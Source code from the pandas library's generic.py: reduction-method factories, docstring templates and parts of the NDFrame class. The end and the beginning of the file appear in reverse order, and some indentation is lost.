... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the maximum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cummax()
A B
0 2.0 1.0
1 3.0 NaN
2 3.0 1.0
To iterate over columns and find the maximum in each row,
use ``axis=1``
>>> df.cummax(axis=1)
A B
0 2.0 2.0
1 3.0 NaN
2 1.0 1.0
"""
# See Also section substituted into _bool_doc for ``any``.
_any_see_also = """\
See Also
--------
numpy.any : Numpy version of this method.
Series.any : Return whether any element is True.
Series.all : Return whether all elements are True.
DataFrame.any : Return whether any element is True over requested axis.
DataFrame.all : Return whether all elements are True over requested axis.
"""
# Description text substituted into _bool_doc for ``any``.
_any_desc = """\
Return whether any element is True, potentially over an axis.
Returns False unless there at least one element within a series or
along a Dataframe axis that is True or equivalent (e.g. non-zero or
non-empty)."""
# Examples section substituted into _bool_doc for ``any``.
_any_examples = """\
Examples
--------
**Series**
For Series input, the output is a scalar indicating whether any element
is True.
>>> pd.Series([False, False]).any()
False
>>> pd.Series([True, False]).any()
True
>>> pd.Series([]).any()
False
>>> pd.Series([np.nan]).any()
False
>>> pd.Series([np.nan]).any(skipna=False)
True
**DataFrame**
Whether each column contains at least one True element (the default).
>>> df = pd.DataFrame({"A": [1, 2], "B": [0, 2], "C": [0, 0]})
>>> df
A B C
0 1 0 0
1 2 2 0
>>> df.any()
A True
B True
C False
dtype: bool
Aggregating over the columns.
>>> df = pd.DataFrame({"A": [True, False], "B": [1, 2]})
>>> df
A B
0 True 1
1 False 2
>>> df.any(axis='columns')
0 True
1 True
dtype: bool
>>> df = pd.DataFrame({"A": [True, False], "B": [1, 0]})
>>> df
A B
0 True 1
1 False 0
>>> df.any(axis='columns')
0 True
1 False
dtype: bool
Aggregating over the entire DataFrame with ``axis=None``.
>>> df.any(axis=None)
True
`any` for an empty DataFrame is an empty Series.
>>> pd.DataFrame([]).any()
Series([], dtype: bool)
"""
# str.format template shared by the sum/max/min examples below; the
# {stat_func}/{verb}/{*_output} fields are filled per function.
_shared_docs[
    "stat_func_example"
] = """
Examples
--------
>>> idx = pd.MultiIndex.from_arrays([
... ['warm', 'warm', 'cold', 'cold'],
... ['dog', 'falcon', 'fish', 'spider']],
... names=['blooded', 'animal'])
>>> s = pd.Series([4, 2, 0, 8], name='legs', index=idx)
>>> s
blooded animal
warm dog 4
falcon 2
cold fish 0
spider 8
Name: legs, dtype: int64
>>> s.{stat_func}()
{default_output}
{verb} using level names, as well as indices.
>>> s.{stat_func}(level='blooded')
blooded
warm {level_output_0}
cold {level_output_1}
Name: legs, dtype: int64
>>> s.{stat_func}(level=0)
blooded
warm {level_output_0}
cold {level_output_1}
Name: legs, dtype: int64"""
_sum_examples = _shared_docs["stat_func_example"].format(
    stat_func="sum", verb="Sum", default_output=14, level_output_0=6, level_output_1=8
)
# sum additionally documents the min_count behaviour.
_sum_examples += """
By default, the sum of an empty or all-NA Series is ``0``.
>>> pd.Series([]).sum() # min_count=0 is the default
0.0
This can be controlled with the ``min_count`` parameter. For example, if
you'd like the sum of an empty series to be NaN, pass ``min_count=1``.
>>> pd.Series([]).sum(min_count=1)
nan
Thanks to the ``skipna`` parameter, ``min_count`` handles all-NA and
empty series identically.
>>> pd.Series([np.nan]).sum()
0.0
>>> pd.Series([np.nan]).sum(min_count=1)
nan"""
_max_examples = _shared_docs["stat_func_example"].format(
    stat_func="max", verb="Max", default_output=8, level_output_0=4, level_output_1=8
)
_min_examples = _shared_docs["stat_func_example"].format(
    stat_func="min", verb="Min", default_output=0, level_output_0=2, level_output_1=0
)
# Shared See Also section for the basic reductions.
_stat_func_see_also = """
See Also
--------
Series.sum : Return the sum.
Series.min : Return the minimum.
Series.max : Return the maximum.
Series.idxmin : Return the index of the minimum.
Series.idxmax : Return the index of the maximum.
DataFrame.sum : Return the sum over the requested axis.
DataFrame.min : Return the minimum over the requested axis.
DataFrame.max : Return the maximum over the requested axis.
DataFrame.idxmin : Return the index of the minimum over the requested axis.
DataFrame.idxmax : Return the index of the maximum over the requested axis."""
# Examples for ``prod`` (min_count behaviour mirrors ``sum``).
_prod_examples = """
Examples
--------
By default, the product of an empty or all-NA Series is ``1``
>>> pd.Series([]).prod()
1.0
This can be controlled with the ``min_count`` parameter
>>> pd.Series([]).prod(min_count=1)
nan
Thanks to the ``skipna`` parameter, ``min_count`` handles all-NA and
empty series identically.
>>> pd.Series([np.nan]).prod()
1.0
>>> pd.Series([np.nan]).prod(min_count=1)
nan"""
# Parameter stub injected as %(min_count)s into _num_doc for sum/prod.
_min_count_stub = """\
min_count : int, default 0
The required number of valid values to perform the operation. If fewer than
``min_count`` non-NA values are present the result will be NA.
.. versionadded:: 0.22.0
Added with the default being 0. This means the sum of an all-NA
or empty Series is 0, and the product of an all-NA or empty
Series is 1.
"""
def _make_min_count_stat_function(
    cls, name, name1, name2, axis_descr, desc, f, see_also: str = "", examples: str = ""
):
    # Factory building a reduction method (sum/prod) that supports the
    # ``min_count`` keyword; Substitution/Appender fill the shared _num_doc
    # template with the per-function description and examples.
    @Substitution(
        desc=desc,
        name1=name1,
        name2=name2,
        axis_descr=axis_descr,
        min_count=_min_count_stub,
        see_also=see_also,
        examples=examples,
    )
    @Appender(_num_doc)
    def stat_func(
        self,
        axis=None,
        skipna=None,
        level=None,
        numeric_only=None,
        min_count=0,
        **kwargs,
    ):
        # numpy-compat kwargs are accepted but must hold their defaults.
        if name == "sum":
            nv.validate_sum(tuple(), kwargs)
        elif name == "prod":
            nv.validate_prod(tuple(), kwargs)
        else:
            nv.validate_stat_func(tuple(), kwargs, fname=name)
        if skipna is None:
            skipna = True
        if axis is None:
            axis = self._stat_axis_number
        if level is not None:
            # MultiIndex level reductions go through groupby-style aggregation.
            return self._agg_by_level(
                name, axis=axis, level=level, skipna=skipna, min_count=min_count
            )
        return self._reduce(
            f,
            name,
            axis=axis,
            skipna=skipna,
            numeric_only=numeric_only,
            min_count=min_count,
        )

    # Bind the proper public name (and qualname) onto the generated function.
    return set_function_name(stat_func, name, cls)
def _make_stat_function(
    cls, name, name1, name2, axis_descr, desc, f, see_also: str = "", examples: str = ""
):
    # Factory building a plain reduction method (mean/median/skew/...);
    # identical to _make_min_count_stat_function but without ``min_count``.
    @Substitution(
        desc=desc,
        name1=name1,
        name2=name2,
        axis_descr=axis_descr,
        min_count="",
        see_also=see_also,
        examples=examples,
    )
    @Appender(_num_doc)
    def stat_func(
        self, axis=None, skipna=None, level=None, numeric_only=None, **kwargs
    ):
        # numpy-compat kwargs are accepted but must hold their defaults.
        if name == "median":
            nv.validate_median(tuple(), kwargs)
        else:
            nv.validate_stat_func(tuple(), kwargs, fname=name)
        if skipna is None:
            skipna = True
        if axis is None:
            axis = self._stat_axis_number
        if level is not None:
            # MultiIndex level reductions go through groupby-style aggregation.
            return self._agg_by_level(name, axis=axis, level=level, skipna=skipna)
        return self._reduce(
            f, name, axis=axis, skipna=skipna, numeric_only=numeric_only
        )

    # Bind the proper public name (and qualname) onto the generated function.
    return set_function_name(stat_func, name, cls)
def _make_stat_function_ddof(cls, name, name1, name2, axis_descr, desc, f):
    # Factory building a variance-style reduction (std/var/sem) that takes a
    # ``ddof`` (delta degrees of freedom) argument.
    @Substitution(desc=desc, name1=name1, name2=name2, axis_descr=axis_descr)
    @Appender(_num_ddof_doc)
    def stat_func(
        self, axis=None, skipna=None, level=None, ddof=1, numeric_only=None, **kwargs
    ):
        # numpy-compat kwargs are accepted but must hold their defaults.
        nv.validate_stat_ddof_func(tuple(), kwargs, fname=name)
        if skipna is None:
            skipna = True
        if axis is None:
            axis = self._stat_axis_number
        if level is not None:
            # MultiIndex level reductions go through groupby-style aggregation.
            return self._agg_by_level(
                name, axis=axis, level=level, skipna=skipna, ddof=ddof
            )
        return self._reduce(
            f, name, axis=axis, numeric_only=numeric_only, skipna=skipna, ddof=ddof
        )

    # Bind the proper public name (and qualname) onto the generated function.
    return set_function_name(stat_func, name, cls)
def _make_cum_function(
    cls,
    name,
    name1,
    name2,
    axis_descr,
    desc,
    accum_func,
    accum_func_name,
    mask_a,
    mask_b,
    examples,
):
    # Factory building a cumulative method (cummin/cummax/cumsum/cumprod).
    # ``accum_func`` is the numpy accumulation ufunc; ``mask_a`` is the value
    # NA positions are replaced with before accumulating (the identity for
    # that operation), ``mask_b`` the value written back afterwards (NaN).
    @Substitution(
        desc=desc,
        name1=name1,
        name2=name2,
        axis_descr=axis_descr,
        accum_func_name=accum_func_name,
        examples=examples,
    )
    @Appender(_cnum_doc)
    def cum_func(self, axis=None, skipna=True, *args, **kwargs):
        skipna = nv.validate_cum_func_with_skipna(skipna, args, kwargs, name)
        if axis is None:
            axis = self._stat_axis_number
        else:
            axis = self._get_axis_number(axis)
        # axis=1 is implemented by transposing, running along axis 0, and
        # transposing back.
        if axis == 1:
            return cum_func(self.T, axis=0, skipna=skipna, *args, **kwargs).T

        def na_accum_func(blk_values):
            # We will be applying this function to block values
            if blk_values.dtype.kind in ["m", "M"]:
                # GH#30460, GH#29058
                # numpy 1.18 started sorting NaTs at the end instead of beginning,
                # so we need to work around to maintain backwards-consistency.
                orig_dtype = blk_values.dtype
                # We need to define mask before masking NaTs
                mask = isna(blk_values)
                if accum_func == np.minimum.accumulate:
                    # Note: the accum_func comparison fails as an "is" comparison
                    y = blk_values.view("i8")
                    y[mask] = np.iinfo(np.int64).max
                    changed = True
                else:
                    y = blk_values
                    changed = False
                result = accum_func(y.view("i8"), axis)
                if skipna:
                    np.putmask(result, mask, iNaT)
                elif accum_func == np.minimum.accumulate:
                    # Restore NaTs that we masked previously
                    nz = (~np.asarray(mask)).nonzero()[0]
                    if len(nz):
                        # everything up to the first non-na entry stays NaT
                        result[: nz[0]] = iNaT
                if changed:
                    # restore NaT elements
                    y[mask] = iNaT  # TODO: could try/finally for this?
                if isinstance(blk_values, np.ndarray):
                    result = result.view(orig_dtype)
                else:
                    # DatetimeArray
                    result = type(blk_values)._from_sequence(result, dtype=orig_dtype)
            elif skipna and not issubclass(
                blk_values.dtype.type, (np.integer, np.bool_)
            ):
                # Float-like data: substitute the operation's identity value
                # at NA positions, accumulate, then restore NaN afterwards.
                vals = blk_values.copy().T
                mask = isna(vals)
                np.putmask(vals, mask, mask_a)
                result = accum_func(vals, axis)
                np.putmask(result, mask, mask_b)
            else:
                result = accum_func(blk_values.T, axis)
            # transpose back for ndarray, not for EA
            return result.T if hasattr(result, "T") else result

        result = self._data.apply(na_accum_func)
        d = self._construct_axes_dict()
        d["copy"] = False
        return self._constructor(result, **d).__finalize__(self)

    # Bind the proper public name (and qualname) onto the generated function.
    return set_function_name(cum_func, name, cls)
def _make_logical_function(
    cls, name, name1, name2, axis_descr, desc, f, see_also, examples, empty_value
):
    # Factory building a boolean reduction method (any/all); ``empty_value``
    # is only used in the docstring to describe the empty/all-NA result.
    @Substitution(
        desc=desc,
        name1=name1,
        name2=name2,
        axis_descr=axis_descr,
        see_also=see_also,
        examples=examples,
        empty_value=empty_value,
    )
    @Appender(_bool_doc)
    def logical_func(self, axis=0, bool_only=None, skipna=True, level=None, **kwargs):
        # numpy-compat kwargs are accepted but must hold their defaults.
        nv.validate_logical_func(tuple(), kwargs, fname=name)
        if level is not None:
            if bool_only is not None:
                raise NotImplementedError(
                    "Option bool_only is not implemented with option level."
                )
            return self._agg_by_level(name, axis=axis, level=level, skipna=skipna)
        return self._reduce(
            f,
            name,
            axis=axis,
            skipna=skipna,
            numeric_only=bool_only,
            filter_type="bool",
        )

    # Bind the proper public name (and qualname) onto the generated function.
    return set_function_name(logical_func, name, cls)
| import collections
from datetime import timedelta
import functools
import gc
import json
import operator
import pickle
import re
from textwrap import dedent
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
FrozenSet,
Hashable,
List,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Type,
Union,
)
import warnings
import weakref
import numpy as np
from pandas._config import config
from pandas._libs import Timestamp, iNaT, lib
from pandas._typing import (
Axis,
FilePathOrBuffer,
FrameOrSeries,
JSONSerializable,
Label,
Level,
Renamer,
)
from pandas.compat import set_function_name
from pandas.compat._optional import import_optional_dependency
from pandas.compat.numpy import function as nv
from pandas.errors import AbstractMethodError
from pandas.util._decorators import (
Appender,
Substitution,
doc,
rewrite_axis_style_signature,
)
from pandas.util._validators import (
validate_bool_kwarg,
validate_fillna_kwargs,
validate_percentile,
)
from pandas.core.dtypes.common import (
ensure_int64,
ensure_object,
ensure_str,
is_bool,
is_bool_dtype,
is_datetime64_any_dtype,
is_datetime64tz_dtype,
is_dict_like,
is_extension_array_dtype,
is_float,
is_integer,
is_list_like,
is_number,
is_numeric_dtype,
is_object_dtype,
is_period_arraylike,
is_re_compilable,
is_scalar,
is_timedelta64_dtype,
pandas_dtype,
)
from pandas.core.dtypes.generic import ABCDataFrame, ABCSeries
from pandas.core.dtypes.inference import is_hashable
from pandas.core.dtypes.missing import isna, notna
import pandas as pd
from pandas.core import missing, nanops
import pandas.core.algorithms as algos
from pandas.core.base import PandasObject, SelectionMixin
import pandas.core.common as com
from pandas.core.construction import create_series_with_explicit_dtype
from pandas.core.indexes.api import (
Index,
InvalidIndexError,
MultiIndex,
RangeIndex,
ensure_index,
)
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.period import Period, PeriodIndex
import pandas.core.indexing as indexing
from pandas.core.internals import BlockManager
from pandas.core.missing import find_valid_index
from pandas.core.ops import _align_method_FRAME
from pandas.io.formats import format as fmt
from pandas.io.formats.format import DataFrameFormatter, format_percentiles
from pandas.io.formats.printing import pprint_thing
from pandas.tseries.frequencies import to_offset
if TYPE_CHECKING:
from pandas.core.resample import Resampler
# goal is to be able to define the docs close to function, while still being
# able to share
_shared_docs: Dict[str, str] = dict()
# Common substitution values used by the shared docstring templates above.
_shared_doc_kwargs = dict(
    axes="keywords for axes",
    klass="Series/DataFrame",
    axes_single_arg="int or labels for object",
    args_transpose="axes to permute (int or label for object)",
    optional_by="""
by : str or list of str
Name or list of names to sort by""",
)
def _single_replace(self, to_replace, method, inplace, limit):
    """
    Replaces values in a Series using the fill method specified when no
    replacement value is given in the replace method
    """
    # Method-based replacement is only defined for 1-D (Series) data.
    if self.ndim != 1:
        raise TypeError(
            f"cannot replace {to_replace} with method {method} on a "
            f"{type(self).__name__}"
        )
    orig_dtype = self.dtype
    result = self if inplace else self.copy()
    fill_f = missing.get_fill_func(method)
    # Mark positions matching ``to_replace`` and fill them from neighbouring
    # values (pad/bfill style), honouring ``limit``.
    mask = missing.mask_missing(result.values, to_replace)
    values = fill_f(result.values, limit=limit, mask=mask)
    if values.dtype == orig_dtype and inplace:
        # Filled in place with no dtype change; nothing left to do.
        return
    result = pd.Series(values, index=self.index, dtype=self.dtype).__finalize__(self)
    if inplace:
        self._update_inplace(result._data)
        return
    return result
bool_t = bool  # Need alias because NDFrame has def bool:


class NDFrame(PandasObject, SelectionMixin, indexing.IndexingMixin):
    """
    N-dimensional analogue of DataFrame. Store multi-dimensional in a
    size-mutable, labeled data structure
    Parameters
    ----------
    data : BlockManager
    axes : list
    copy : bool, default False
    """

    # Attribute names that are object-internal state, never treated as
    # axis labels by attribute access.
    _internal_names: List[str] = [
        "_data",
        "_cacher",
        "_item_cache",
        "_cache",
        "_is_copy",
        "_subtyp",
        "_name",
        "_index",
        "_default_kind",
        "_default_fill_value",
        "_metadata",
        "__array_struct__",
        "__array_interface__",
    ]
    # Set form of _internal_names for O(1) membership checks.
    _internal_names_set: Set[str] = set(_internal_names)
    # Names of registered accessors (e.g. ``.str``/``.dt``) added by subclasses.
    _accessors: Set[str] = set()
    # Deprecated attribute names; access warns before removal.
    _deprecations: FrozenSet[str] = frozenset(["get_values"])
    # Per-subclass attribute names propagated through __finalize__.
    _metadata: List[str] = []
    _is_copy = None
    _data: BlockManager
    _attrs: Dict[Optional[Hashable], Any]
    _typ: str

    # ----------------------------------------------------------------------
    # Constructors
    def __init__(
        self,
        data: BlockManager,
        copy: bool = False,
        attrs: Optional[Mapping[Optional[Hashable], Any]] = None,
    ):
        # copy kwarg is retained for mypy compat, is not used
        # object.__setattr__ bypasses the normal attribute-setting machinery
        # so internal state never goes through label-based __setattr__ logic.
        object.__setattr__(self, "_is_copy", None)
        object.__setattr__(self, "_data", data)
        object.__setattr__(self, "_item_cache", {})
        if attrs is None:
            attrs = {}
        else:
            # Copy so callers cannot mutate our attrs mapping from outside.
            attrs = dict(attrs)
        object.__setattr__(self, "_attrs", attrs)
    @classmethod
    def _init_mgr(cls, mgr, axes=None, dtype=None, copy=False):
        """ passed a manager and a axes dict """
        # Reindex the manager along each axis that was explicitly supplied.
        for a, axe in axes.items():
            if axe is not None:
                mgr = mgr.reindex_axis(
                    axe, axis=cls._get_block_manager_axis(a), copy=False
                )
        # make a copy if explicitly requested
        if copy:
            mgr = mgr.copy()
        if dtype is not None:
            # avoid further copies if we can
            if len(mgr.blocks) > 1 or mgr.blocks[0].values.dtype != dtype:
                mgr = mgr.astype(dtype=dtype)
        return mgr
    # ----------------------------------------------------------------------
    @property
    def attrs(self) -> Dict[Optional[Hashable], Any]:
        """
        Dictionary of global attributes on this object.
        .. warning::
        attrs is experimental and may change without warning.
        """
        # Lazily initialize so objects created without attrs still work.
        if self._attrs is None:
            self._attrs = {}
        return self._attrs

    @attrs.setter
    def attrs(self, value: Mapping[Optional[Hashable], Any]) -> None:
        # Copy into a plain dict so later external mutation cannot leak in.
        self._attrs = dict(value)
@classmethod
def _validate_dtype(cls, dtype):
""" validate the passed dtype """
if dtype is not None:
dtype = pandas_dtype(dtype)
# a compound dtype
if dtype.kind == "V":
raise NotImplementedError(
"compound dtypes are not implemented "
f"in the {cls.__name__} constructor"
)
return dtype
    # ----------------------------------------------------------------------
    # Construction

    # Abstract constructor hooks: subclasses (Series/DataFrame) point these at
    # the appropriate class so generic code can build results of the right type.
    @property
    def _constructor(self: FrameOrSeries) -> Type[FrameOrSeries]:
        """
        Used when a manipulation result has the same dimensions as the
        original.
        """
        raise AbstractMethodError(self)

    @property
    def _constructor_sliced(self):
        """
        Used when a manipulation result has one lower dimension(s) as the
        original, such as DataFrame single columns slicing.
        """
        raise AbstractMethodError(self)

    @property
    def _constructor_expanddim(self):
        """
        Used when a manipulation result has one higher dimension as the
        original, such as Series.to_frame()
        """
        raise NotImplementedError
# ----------------------------------------------------------------------
# Axis
_AXIS_ALIASES = {"rows": 0}
_AXIS_IALIASES = {0: "rows"}
_stat_axis_number = 0
_stat_axis_name = "index"
_ix = None
_AXIS_ORDERS: List[str]
_AXIS_NUMBERS: Dict[str, int]
_AXIS_NAMES: Dict[int, str]
_AXIS_REVERSED: bool
_info_axis_number: int
_info_axis_name: str
_AXIS_LEN: int
def _construct_axes_dict(self, axes=None, **kwargs):
"""Return an axes dictionary for myself."""
d = {a: self._get_axis(a) for a in (axes or self._AXIS_ORDERS)}
d.update(kwargs)
return d
    @classmethod
    def _construct_axes_from_arguments(
        cls, args, kwargs, require_all: bool = False, sentinel=None
    ):
        """
        Construct and returns axes if supplied in args/kwargs.
        If require_all, raise if all axis arguments are not supplied
        return a tuple of (axes, kwargs).
        sentinel specifies the default parameter when an axis is not
        supplied; useful to distinguish when a user explicitly passes None
        in scenarios where None has special meaning.
        """
        # construct the args
        args = list(args)
        for a in cls._AXIS_ORDERS:
            # look for a argument by position
            if a not in kwargs:
                try:
                    # Consume positional arguments in axis order.
                    kwargs[a] = args.pop(0)
                except IndexError as err:
                    if require_all:
                        raise TypeError(
                            "not enough/duplicate arguments specified!"
                        ) from err
        # Pop the axis entries out of kwargs, leaving the remaining keywords.
        axes = {a: kwargs.pop(a, sentinel) for a in cls._AXIS_ORDERS}
        return axes, kwargs
@classmethod
def _get_axis_number(cls, axis):
axis = cls._AXIS_ALIASES.get(axis, axis)
if is_integer(axis):
if axis in cls._AXIS_NAMES:
return axis
else:
try:
return cls._AXIS_NUMBERS[axis]
except KeyError:
pass
raise ValueError(f"No axis named {axis} for object type {cls}")
@classmethod
def _get_axis_name(cls, axis):
axis = cls._AXIS_ALIASES.get(axis, axis)
if isinstance(axis, str):
if axis in cls._AXIS_NUMBERS:
return axis
else:
try:
return cls._AXIS_NAMES[axis]
except KeyError:
pass
raise ValueError(f"No axis named {axis} for object type {cls}")
    def _get_axis(self, axis):
        # Resolve to the canonical axis name, then return that Index attribute.
        name = self._get_axis_name(axis)
        return getattr(self, name)
@classmethod
def _get_block_manager_axis(cls, axis):
"""Map the axis to the block_manager axis."""
axis = cls._get_axis_number(axis)
if cls._AXIS_REVERSED:
m = cls._AXIS_LEN - 1
return m - axis
return axis
    def _get_axis_resolvers(self, axis: str) -> Dict[str, ABCSeries]:
        """Build name -> Series resolvers for one axis, for query/eval use."""
        # index or columns
        axis_index = getattr(self, axis)
        d = dict()
        prefix = axis[0]
        for i, name in enumerate(axis_index.names):
            if name is not None:
                key = level = name
            else:
                # prefix with 'i' or 'c' depending on the input axis
                # e.g., you must do ilevel_0 for the 0th level of an unnamed
                # multiiindex
                key = f"{prefix}level_{i}"
                level = i
            # Expose each level as a Series aligned on the full axis index.
            level_values = axis_index.get_level_values(level)
            s = level_values.to_series()
            s.index = axis_index
            d[key] = s
        # put the index/columns itself in the dict
        if isinstance(axis_index, MultiIndex):
            dindex = axis_index
        else:
            dindex = axis_index.to_series()
        d[axis] = dindex
        return d
    def _get_index_resolvers(self) -> Dict[str, ABCSeries]:
        """Collect resolvers for every axis, with cleaned (backtickable) names."""
        from pandas.core.computation.parsing import clean_column_name

        d: Dict[str, ABCSeries] = {}
        for axis_name in self._AXIS_ORDERS:
            d.update(self._get_axis_resolvers(axis_name))
        # Integer keys cannot be referenced by name in query/eval; drop them.
        return {clean_column_name(k): v for k, v in d.items() if not isinstance(k, int)}
    def _get_cleaned_column_resolvers(self) -> Dict[str, ABCSeries]:
        """
        Return the special character free column resolvers of a dataframe.
        Column names with special characters are 'cleaned up' so that they can
        be referred to by backtick quoting.
        Used in :meth:`DataFrame.eval`.
        """
        from pandas.core.computation.parsing import clean_column_name

        # For a Series, the only resolvable "column" is the Series itself.
        if isinstance(self, ABCSeries):
            return {clean_column_name(self.name): self}
        # Integer column labels cannot be referenced by name; skip them.
        return {
            clean_column_name(k): v for k, v in self.items() if not isinstance(k, int)
        }
    @property
    def _info_axis(self):
        # The axis holding the "items" (columns for DataFrame, index for Series).
        return getattr(self, self._info_axis_name)

    @property
    def _stat_axis(self):
        # The default axis along which statistical reductions operate.
        return getattr(self, self._stat_axis_name)
    @property
    def shape(self) -> Tuple[int, ...]:
        """
        Return a tuple of axis dimensions
        """
        # One length per axis, in the public axis order.
        return tuple(len(self._get_axis(a)) for a in self._AXIS_ORDERS)
    @property
    def axes(self) -> List[Index]:
        """
        Return index label(s) of the internal NDFrame
        """
        # we do it this way because if we have reversed axes, then
        # the block manager shows then reversed
        return [self._get_axis(a) for a in self._AXIS_ORDERS]
    @property
    def ndim(self) -> int:
        """
        Return an int representing the number of axes / array dimensions.
        Return 1 if Series. Otherwise return 2 if DataFrame.
        See Also
        --------
        ndarray.ndim : Number of array dimensions.
        Examples
        --------
        >>> s = pd.Series({'a': 1, 'b': 2, 'c': 3})
        >>> s.ndim
        1
        >>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
        >>> df.ndim
        2
        """
        # Delegate to the BlockManager, which knows its dimensionality.
        return self._data.ndim
@property
def size(self) -> int:
"""
Return an int representing the number of elements in this object.
Return the number of rows if Series. Otherwise return the number of
rows times number of columns if DataFrame.
See Also
--------
ndarray.size : Number of elements in the array.
Examples
--------
>>> s = pd.Series({'a': 1, 'b': 2, 'c': 3})
>>> s.size
3
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.size
4
"""
return np.prod(self.shape)
    @property
    def _selected_obj(self: FrameOrSeries) -> FrameOrSeries:
        """ internal compat with SelectionMixin """
        # NDFrame has no column selection applied, so the "selected"
        # object is simply the object itself.
        return self
    @property
    def _obj_with_exclusions(self: FrameOrSeries) -> FrameOrSeries:
        """ internal compat with SelectionMixin """
        # No exclusions are tracked at the NDFrame level; return self.
        return self
    def set_axis(self, labels, axis: Axis = 0, inplace: bool = False):
        """
        Assign desired index to given axis.

        Indexes for%(extended_summary_sub)s row labels can be changed by assigning
        a list-like or Index.

        .. versionchanged:: 0.21.0
           The signature is now `labels` and `axis`, consistent with
           the rest of pandas API. Previously, the `axis` and `labels`
           arguments were respectively the first and second positional
           arguments.

        Parameters
        ----------
        labels : list-like, Index
            The values for the new index.
        axis : %(axes_single_arg)s, default 0
            The axis to update. The value 0 identifies the rows%(axis_description_sub)s.
        inplace : bool, default False
            Whether to return a new %(klass)s instance.

        Returns
        -------
        renamed : %(klass)s or None
            An object of type %(klass)s if inplace=False, None otherwise.

        See Also
        --------
        %(klass)s.rename_axis : Alter the name of the index%(see_also_sub)s.
        """
        if inplace:
            # Assigning to the axis attribute (e.g. ``.index``) routes
            # through _set_axis, which validates/coerces the labels.
            setattr(self, self._get_axis_name(axis), labels)
        else:
            # Copy first, then re-enter with inplace=True on the copy,
            # and return it (implicitly returns None in the inplace case).
            obj = self.copy()
            obj.set_axis(labels, axis=axis, inplace=True)
            return obj
    def _set_axis(self, axis: int, labels: Index) -> None:
        # Coerce ``labels`` to a proper Index, install it on the block
        # manager, then drop the item cache since cached columns may
        # reference the old labels.
        labels = ensure_index(labels)
        self._data.set_axis(axis, labels)
        self._clear_item_cache()
    def swapaxes(self: FrameOrSeries, axis1, axis2, copy=True) -> FrameOrSeries:
        """
        Interchange axes and swap values axes appropriately.

        Returns
        -------
        y : same as input
        """
        i = self._get_axis_number(axis1)
        j = self._get_axis_number(axis2)
        # Swapping an axis with itself is a no-op (modulo the copy request).
        if i == j:
            if copy:
                return self.copy()
            return self
        mapping = {i: j, j: i}
        # Reorder the axis labels so they line up with the transposed values.
        new_axes = (self._get_axis(mapping.get(k, k)) for k in range(self._AXIS_LEN))
        new_values = self.values.swapaxes(i, j)
        if copy:
            new_values = new_values.copy()
        return self._constructor(new_values, *new_axes).__finalize__(self)
def droplevel(self: FrameOrSeries, level, axis=0) -> FrameOrSeries:
"""
Return DataFrame with requested index / column level(s) removed.
.. versionadded:: 0.24.0
Parameters
----------
level : int, str, or list-like
If a string is given, must be the name of a level
If list-like, elements must be names or positional indexes
of levels.
axis : {0 or 'index', 1 or 'columns'}, default 0
Axis along which the level(s) is removed:
* 0 or 'index': remove level(s) in column.
* 1 or 'columns': remove level(s) in row.
Returns
-------
DataFrame
DataFrame with requested index / column level(s) removed.
Examples
--------
>>> df = pd.DataFrame([
... [1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12]
... ]).set_index([0, 1]).rename_axis(['a', 'b'])
>>> df.columns = pd.MultiIndex.from_tuples([
... ('c', 'e'), ('d', 'f')
... ], names=['level_1', 'level_2'])
>>> df
level_1 c d
level_2 e f
a b
1 2 3 4
5 6 7 8
9 10 11 12
>>> df.droplevel('a')
level_1 c d
level_2 e f
b
2 3 4
6 7 8
10 11 12
>>> df.droplevel('level_2', axis=1)
level_1 c d
a b
1 2 3 4
5 6 7 8
9 10 11 12
"""
labels = self._get_axis(axis)
new_labels = labels.droplevel(level)
result = self.set_axis(new_labels, axis=axis, inplace=False)
return result
def pop(self: FrameOrSeries, item) -> FrameOrSeries:
"""
Return item and drop from frame. Raise KeyError if not found.
Parameters
----------
item : str
Label of column to be popped.
Returns
-------
Series
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0),
... ('parrot', 'bird', 24.0),
... ('lion', 'mammal', 80.5),
... ('monkey', 'mammal', np.nan)],
... columns=('name', 'class', 'max_speed'))
>>> df
name class max_speed
0 falcon bird 389.0
1 parrot bird 24.0
2 lion mammal 80.5
3 monkey mammal NaN
>>> df.pop('class')
0 bird
1 bird
2 mammal
3 mammal
Name: class, dtype: object
>>> df
name max_speed
0 falcon 389.0
1 parrot 24.0
2 lion 80.5
3 monkey NaN
"""
result = self[item]
del self[item]
try:
result._reset_cacher()
except AttributeError:
pass
return result
def squeeze(self, axis=None):
"""
Squeeze 1 dimensional axis objects into scalars.
Series or DataFrames with a single element are squeezed to a scalar.
DataFrames with a single column or a single row are squeezed to a
Series. Otherwise the object is unchanged.
This method is most useful when you don't know if your
object is a Series or DataFrame, but you do know it has just a single
column. In that case you can safely call `squeeze` to ensure you have a
Series.
Parameters
----------
axis : {0 or 'index', 1 or 'columns', None}, default None
A specific axis to squeeze. By default, all length-1 axes are
squeezed.
Returns
-------
DataFrame, Series, or scalar
The projection after squeezing `axis` or all the axes.
See Also
--------
Series.iloc : Integer-location based indexing for selecting scalars.
DataFrame.iloc : Integer-location based indexing for selecting Series.
Series.to_frame : Inverse of DataFrame.squeeze for a
single-column DataFrame.
Examples
--------
>>> primes = pd.Series([2, 3, 5, 7])
Slicing might produce a Series with a single value:
>>> even_primes = primes[primes % 2 == 0]
>>> even_primes
0 2
dtype: int64
>>> even_primes.squeeze()
2
Squeezing objects with more than one value in every axis does nothing:
>>> odd_primes = primes[primes % 2 == 1]
>>> odd_primes
1 3
2 5
3 7
dtype: int64
>>> odd_primes.squeeze()
1 3
2 5
3 7
dtype: int64
Squeezing is even more effective when used with DataFrames.
>>> df = pd.DataFrame([[1, 2], [3, 4]], columns=['a', 'b'])
>>> df
a b
0 1 2
1 3 4
Slicing a single column will produce a DataFrame with the columns
having only one value:
>>> df_a = df[['a']]
>>> df_a
a
0 1
1 3
So the columns can be squeezed down, resulting in a Series:
>>> df_a.squeeze('columns')
0 1
1 3
Name: a, dtype: int64
Slicing a single row from a single column will produce a single
scalar DataFrame:
>>> df_0a = df.loc[df.index < 1, ['a']]
>>> df_0a
